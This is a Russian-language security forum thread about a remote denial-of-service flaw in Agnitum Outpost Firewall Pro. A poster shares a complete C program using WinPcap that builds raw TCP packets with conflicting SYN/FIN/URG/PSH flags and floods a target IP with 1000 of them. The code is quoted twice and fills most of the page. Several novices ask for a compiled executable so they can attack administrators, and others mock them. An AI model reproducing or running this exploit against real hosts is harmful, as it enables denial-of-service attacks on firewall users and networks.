Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: 1 2 След.
RSS
Удаленный отказ в обслуживании против Agnitum Outpost Firewall Pro
 
Обсуждение статьи Удаленный отказ в обслуживании против Agnitum Outpost Firewall Pro
 
А эта бага на все версии Outpost'а [IMG]http://www.securitylab.ru/forum/smileys/smiley25.gif[/IMG]
 
Ссылчку киньте на эксплойт а то я (смотри ник) и сам что то найти не могу а злых админов таким (смотри ник) повзламывать тоже охота, а самому в этом всем разбираться лень я вообще первый раз все эти названия вижу и что такое эксплойт толком не знаю. Знаю только про нюки но они у меня не работают и про вирусы потому что кучу бабок выложил специалистам за лечение своего компа. Так что если можно еще и ссылочку на информацию по теме что такое эксплойт. И надеюсь ссылка будет на exe файл а то .с плохо работает вернее не работает совсем. Мне один хакер крутой сказал что .с не работаю потому что их когда делали им разрешение другое дали вообщем не профессионалы делали. Заранее благодарен (смотри ник)
ps На ошибки не смотрите таким как я (смотри ник) руссский язык знать не обязательно.
 
Загляните сюда
:))

http://www.security.nnov.ru/search/document.asp?docid=6205
 
а ну тогда надо через дыру в почте взломать TCP/IP порты с кодировкой Agnitum Outpost и закинуть туда очень крутой вирус Crazu CD (вроде так пишется)
 
странно это название мне знакомо, но всяко там какие нибудь чуваки сидят которые ничего не заметят
 
Цитата
Antonio пишет:
Загляните сюда
:))
http://www.security.nnov.ru/search/document.asp?docid=6205
Это не совсем то, что нужно. Желательно увидеть сплоит всё таки на С.
 
// Может и не заработать...
// Project->Settings->Link->LibraryModules wpcap.lib
#include <pcap.h> // http://winpcap.polito.it/install/bin/wpdpack_3_0.zip
#include <stdlib.h>

struct ETH_packet_header {
char     dst[6];
char     src[6];
unsigned proto : 16; // prototol (0x0800 for IP)
};

struct IP_packet_header {
unsigned ihl : 4;
unsigned ver : 4;
unsigned tos : 8;
unsigned len : 16;
unsigned id : 16;
unsigned flags_fo : 16;
unsigned ttl : 8;
unsigned proto : 8;
unsigned hcs : 16;
unsigned char src[4];
unsigned char dst[4];
unsigned sport : 16;
unsigned dport : 16;
};

struct TCP_packet_header {
unsigned sport : 16;
unsigned dport : 16;
unsigned snum : 32;
unsigned anum : 32;
unsigned data_offs : 4;
unsigned reserved : 4;
unsigned flag_CWR : 1;
unsigned flag_ECN : 1;
unsigned flag_URG : 1;
unsigned flag_ACK : 1;
unsigned flag_PSH : 1;
unsigned flag_RST : 1;
unsigned flag_SYN : 1;
unsigned flag_FIN : 1;
unsigned wind : 16;
unsigned crc : 16;
unsigned up : 16;
unsigned opt : 32;
};

int main(int argc, char* argv[])
{
    pcap_if_t *alldevs;
    pcap_if_t *d;
    int inum;
    int i=0;
    pcap_t *adhandle;
    char errbuf[PCAP_ERRBUF_SIZE];
    char packet[60];
    struct ETH_packet_header *ethpkt;
    struct IP_packet_header *ippkt;
    struct TCP_packet_header *tcppkt;

    if (pcap_findalldevs(&alldevs, errbuf) == -1)
    {       ;  fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);    }
    for(d=alldevs; d; d=d->next)
    {       ;  printf("%d. %s", ++i, d->name);
        if (d->description)        ;     printf(" (%s)\n", d->description);
        else         &n bsp;  printf(" (No description available)\n");    }
    if(i==0)
    {       ;  printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return 1;    }
    printf("Enter the interface number (1-%d):",i);
    scanf("%d", &inum);
    if(inum < 1 || inum > i)
    {       ;  printf("\nInterface number out of range.\n");
        pcap_freealldevs(alldevs);
        return -1;    }
    for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
    if ( (adhandle= pcap_open_live(d->name, 65536, 1, 1000, errbuf) ) == NULL)
    {       ;  fprintf(stderr,"\nUnable to open the adapter. %s is not supported by Pcap\n");
        pcap_freealldevs(alldevs);
        return -1;    }
    if(pcap_datalink(adhandle) != DLT_EN10MB)
    {       ;  fprintf(stderr,"\nThis program works only on Ethernet networks.\n");
        pcap_freealldevs(alldevs);
        return 1;    }
    pcap_freealldevs(alldevs);

    /* START main part */
    ethpkt = (struct ETH_packet_header *)packet;
    ippkt = (struct IP_packet_header *)(packet+14);
    tcppkt = (struct TCP_packet_header *)(packet+14+20);
    for (i=0;i<6;i++)
    {
           ethpkt->dst[i]=(char)0xFF; //dst MAC = FF:FF:FF:FF:FF:FF
           ethpkt->src[i]=0x11+i; //src MAC = 11:12:13:14:15:16
    }
     ethpkt->proto=0x0008; // IP protocol
    //filling the IP header
    ippkt->ver=4; //IP version
    ippkt->ihl=5; //Internet Header Length = 20 bytes, i.e. (5*4)
    ippkt->tos=0; //type of service - default
    ippkt->len=100-14; //length of IP packet: our buffer minus 14 (length of ETH)
    ippkt->id=0; //without fragmentation
    ippkt->flags_fo=0; // no flags, no fragment offset
    ippkt->ttl=64; //time to live = standard Linux default ???
    ippkt->proto=0x06; //protocol - TCP
    ippkt->hcs=0; //header CRC - 0 means no checking
    ippkt->src[0]=192;
     ippkt->src[1]=168;
    ippkt->src[2]=0;
    ippkt->src[3]=1; // change it

     if(argc<2) {printf("Usage: %s ddd.ddd.ddd.ddd\n", argv[0]); exit(1);}
     sscanf(argv[1], "%d.%d.%d.%d",
           &(ippkt->dst[0]), &(ippkt->dst[1]), &(ippkt->dst[2]), &(ippkt->dst[3]));
/*    ippkt->dst[0]=192;
     ippkt->dst[1]=168;
    ippkt->dst[2]=255;
    ippkt->dst[3]=255; */

     tcppkt->sport=rand();
     tcppkt->dport=rand();
     tcppkt->anum=rand();
     tcppkt->snum=rand();
     tcppkt->data_offs=5; // 5*(32/8)=20+20
     tcppkt->reserved=0;
     tcppkt->flag_CWR=0; // flag Congestion Window Reduced
     tcppkt->flag_ECN=0; // flag ECN-Echo
     tcppkt->flag_URG=1; // flag urgent
     tcppkt->flag_ACK=0; // flag acknowlegment
     tcppkt->flag_PSH=1; // flag push
     tcppkt->flag_RST=0; // flag reset
     tcppkt->flag_SYN=1; // flag sunchronize
     tcppkt->flag_FIN=1; // flag final (no data)
     tcppkt->wind=0; // number of octets which sender of that packet still waiting for (window)
     tcppkt->crc=0; // CRC of whole TCP and IP packet.

     inum=1000;
     printf("Sending %d packets to %d.%d.%d.%d\n", inum,
           ippkt->dst[0], ippkt->dst[1], ippkt->dst[2], ippkt->dst[3]);
     for(i=0; i<inum; i++)
           pcap_sendpacket(adhandle, (unsigned char *)packet, 60);
     printf("Profram finished...\n");

     pcap_close(adhandle);
     exit(0);
}
 
Люди, плз, откомпильте код, а то нигде не могу C найти!!!
 
Откомпилил... не работает :(
 
а ты думал?.. :)
 
Цитата
Хакер пишет:
Ссылчку киньте на эксплойт а то я (смотри ник) и сам что то найти не могу а злых админов таким (смотри ник) повзламывать тоже охота, а самому в этом всем разбираться лень я вообще первый раз все эти названия вижу и что такое эксплойт толком не знаю. Знаю только про нюки но они у меня не работают и про вирусы потому что кучу бабок выложил специалистам за лечение своего компа. Так что если можно еще и ссылочку на информацию по теме что такое эксплойт. И надеюсь ссылка будет на exe файл а то .с плохо работает вернее не работает совсем. Мне один хакер крутой сказал что .с не работаю потому что их когда делали им разрешение другое дали вообщем не профессионалы делали. Заранее благодарен (смотри ник)
ps На ошибки не смотрите таким как я (смотри ник) руссский язык знать не обязательно.
 
Цитата
Хакер пишет:
Ссылчку киньте на эксплойт а то я (смотри ник) и сам что то найти не могу а злых админов таким (смотри ник) повзламывать тоже охота, а самому в этом всем разбираться лень я вообще первый раз все эти названия вижу и что такое эксплойт толком не знаю. Знаю только про нюки но они у меня не работают и про вирусы потому что кучу бабок выложил специалистам за лечение своего компа. Так что если можно еще и ссылочку на информацию по теме что такое эксплойт. И надеюсь ссылка будет на exe файл а то .с плохо работает вернее не работает совсем. Мне один хакер крутой сказал что .с не работаю потому что их когда делали им разрешение другое дали вообщем не профессионалы делали. Заранее благодарен (смотри ник)
ps На ошибки не смотрите таким как я (смотри ник) руссский язык знать не обязательно.

Аааа [IMG]http://www.securitylab.ru/forum/smileys/smiley26.gif[/IMG] если ето писмо настоящее......... то ето образец ЛАМЕРИЗМА в ЧИСТОМ ПЕРВОРОДНОМ виде
[IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] ну просто улет, да и ТАкие пользователи РЕАЛЬНАЯ угроза обществу
 
откомпилил тут типа он пишет просто windows=0 мож что писать еще надо скажите
 
Цитата
_KS_ пишет:
// Может и не заработать...
// Project->Settings->Link->LibraryModules wpcap.lib
#include <pcap.h> // http://winpcap.polito.it/install/bin/wpdpack_3_0.zip
#include <stdlib.h>

struct ETH_packet_header {
char     dst[6];
char     src[6];
unsigned proto : 16; // prototol (0x0800 for IP)
};

struct IP_packet_header {
unsigned ihl : 4;
unsigned ver : 4;
unsigned tos : 8;
unsigned len : 16;
unsigned id : 16;
unsigned flags_fo : 16;
unsigned ttl : 8;
unsigned proto : 8;
unsigned hcs : 16;
unsigned char src[4];
unsigned char dst[4];
unsigned sport : 16;
unsigned dport : 16;
};

struct TCP_packet_header {
unsigned sport : 16;
unsigned dport : 16;
unsigned snum : 32;
unsigned anum : 32;
unsigned data_offs : 4;
unsigned reserved : 4;
unsigned flag_CWR : 1;
unsigned flag_ECN : 1;
unsigned flag_URG : 1;
unsigned flag_ACK : 1;
unsigned flag_PSH : 1;
unsigned flag_RST : 1;
unsigned flag_SYN : 1;
unsigned flag_FIN : 1;
unsigned wind : 16;
unsigned crc : 16;
unsigned up : 16;
unsigned opt : 32;
};

int main(int argc, char* argv[])
{
    pcap_if_t *alldevs;
    pcap_if_t *d;
    int inum;
    int i=0;
    pcap_t *adhandle;
    char errbuf[PCAP_ERRBUF_SIZE];
    char packet[60];
    struct ETH_packet_header *ethpkt;
    struct IP_packet_header *ippkt;
    struct TCP_packet_header *tcppkt;

    if (pcap_findalldevs(&alldevs, errbuf) == -1)
     {      ; ; fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);    }
    for(d=alldevs; d; d=d->next)
     {      ; ; printf("%d. %s", ++i, d->name);
        if (d->description)       ;     printf(" (%s)\n", d->description);
        else        &n bsp; printf(" (No description available)\n");    }
    if(i==0)
     {      ; ; printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return 1;    }
    printf("Enter the interface number (1-%d):",i);
    scanf("%d", &inum);
    if(inum < 1 || inum > i)
     {      ; ; printf("\nInterface number out of range.\n");
        pcap_freealldevs(alldevs);
        return -1;    }
    for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
    if ( (adhandle= pcap_open_live(d->name, 65536, 1, 1000, errbuf) ) == NULL)
     {      ; ; fprintf(stderr,"\nUnable to open the adapter. %s is not supported by Pcap\n");
        pcap_freealldevs(alldevs);
        return -1;    }
    if(pcap_datalink(adhandle) != DLT_EN10MB)
     {      ; ; fprintf(stderr,"\nThis program works only on Ethernet networks.\n");
        pcap_freealldevs(alldevs);
        return 1;    }
    pcap_freealldevs(alldevs);

    /* START main part */
    ethpkt = (struct ETH_packet_header *)packet;
    ippkt = (struct IP_packet_header *)(packet+14);
    tcppkt = (struct TCP_packet_header *)(packet+14+20);
    for (i=0;i<6;i++)
    {
             ethpkt->dst[I]=(char)0xFF; //dst MAC = FF:FF:FF:FF:FF:FF
             ethpkt->src[I]=0x11+i; //src MAC = 11:12:13:14:15:16
    }
     ethpkt->proto=0x0008; // IP protocol
    //filling the IP header
    ippkt->ver=4; //IP version
    ippkt->ihl=5; //Internet Header Length = 20 bytes, i.e. (5*4)
    ippkt->tos=0; //type of service - default
    ippkt->len=100-14; //length of IP packet: our buffer minus 14 (length of ETH)
    ippkt->id=0; //without fragmentation
    ippkt->flags_fo=0; // no flags, no fragment offset
    ippkt->ttl=64; //time to live = standard Linux default ???
    ippkt->proto=0x06; //protocol - TCP
    ippkt->hcs=0; //header CRC - 0 means no checking
    ippkt->src[0]=192;
     ippkt->src[1]=168;
    ippkt->src[2]=0;
    ippkt->src[3]=1; // change it

     if(argc<2) {printf("Usage: %s ddd.ddd.ddd.ddd\n", argv[0]); exit(1);}
     sscanf(argv[1], "%d.%d.%d.%d",
             &(ippkt->dst[0]), &(ippkt->dst[1]), &(ippkt->dst[2]), &(ippkt->dst[3]));
/*    ippkt->dst[0]=192;
     ippkt->dst[1]=168;
    ippkt->dst[2]=255;
    ippkt->dst[3]=255; */

     tcppkt->sport=rand();
     tcppkt->dport=rand();
     tcppkt->anum=rand();
     tcppkt->snum=rand();
     tcppkt->data_offs=5; // 5*(32/8)=20+20
     tcppkt->reserved=0;
     tcppkt->flag_CWR=0; // flag Congestion Window Reduced
     tcppkt->flag_ECN=0; // flag ECN-Echo
     tcppkt->flag_URG=1; // flag urgent
     tcppkt->flag_ACK=0; // flag acknowlegment
     tcppkt->flag_PSH=1; // flag push
     tcppkt->flag_RST=0; // flag reset
     tcppkt->flag_SYN=1; // flag sunchronize
     tcppkt->flag_FIN=1; // flag final (no data)
     tcppkt->wind=0; // number of octets which sender of that packet still waiting for (window)
     tcppkt->crc=0; // CRC of whole TCP and IP packet.

     inum=1000;
     printf("Sending %d packets to %d.%d.%d.%d\n", inum,
             ippkt->dst[0], ippkt->dst[1], ippkt->dst[2], ippkt->dst[3]);
     for(i=0; i<inum; i++)
             pcap_sendpacket(adhandle, (unsigned char *)packet, 60);
     printf("Profram finished...\n");

     pcap_close(adhandle);
     exit(0);
}

Не получилось откомпилить. Можешь выслать(kif0rt@tut.by) или дать ссылку на exe'шник. Очень надо.Спасибо.
 
языки бы выучили с начала хакеры блин

а за исходник спасибо
 
Не компилится исходник, хоть и скачал дополнительные библиотеки, дайте ссылку на скомпиленый експолй, плз.
 
Цитата
Хакер пишет:
Ссылчку киньте на эксплойт а то я (смотри ник) и сам что то найти не могу а злых админов таким (смотри ник) повзламывать тоже охота, а самому в этом всем разбираться лень я вообще первый раз все эти названия вижу и что такое эксплойт толком не знаю. Знаю только про нюки но они у меня не работают и про вирусы потому что кучу бабок выложил специалистам за лечение своего компа. Так что если можно еще и ссылочку на информацию по теме что такое эксплойт. И надеюсь ссылка будет на exe файл а то .с плохо работает вернее не работает совсем. Мне один хакер крутой сказал что .с не работаю потому что их когда делали им разрешение другое дали вообщем не профессионалы делали. Заранее благодарен (смотри ник)
ps На ошибки не смотрите таким как я (смотри ник) руссский язык знать не обязательно.
Если ничего не знаешь, то иди по ссылкам:
http://www.yandex.ru/yandsearch?text=%D7%F2%EE+%F2%E0%EA%EE% E5+%FD%EA%F1%EF%EB%EE%E8%F2%3F
http://www.yandex.ru/yandsearch?text=%CA%E0%EA+%E2%FB%EB%E5% F7%E8%F2%FC+%E2%E8%F0%F3%F1%E0%3Fstype=www
http://www.yandex.ru/yandsearch?text=%CA%E0%EA+%E2%FB%EB%E5% F7%E8%F2%FC+%E2%E8%F0%F3%F1%E0%3Fstype=www
а не засоряй форум тупыми вопросами [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG]
 
Реальный ответ на тупые вопросы!!!
 
Не надо рассказывать шо здесь все тупые(может просто неполучается) лучше объясните как компилировать или дайте ссылку на уже откомпилированный или вышлете на мыло. Заране благодарен
Страницы: 1 2 След.
Читают тему (гостей: 1)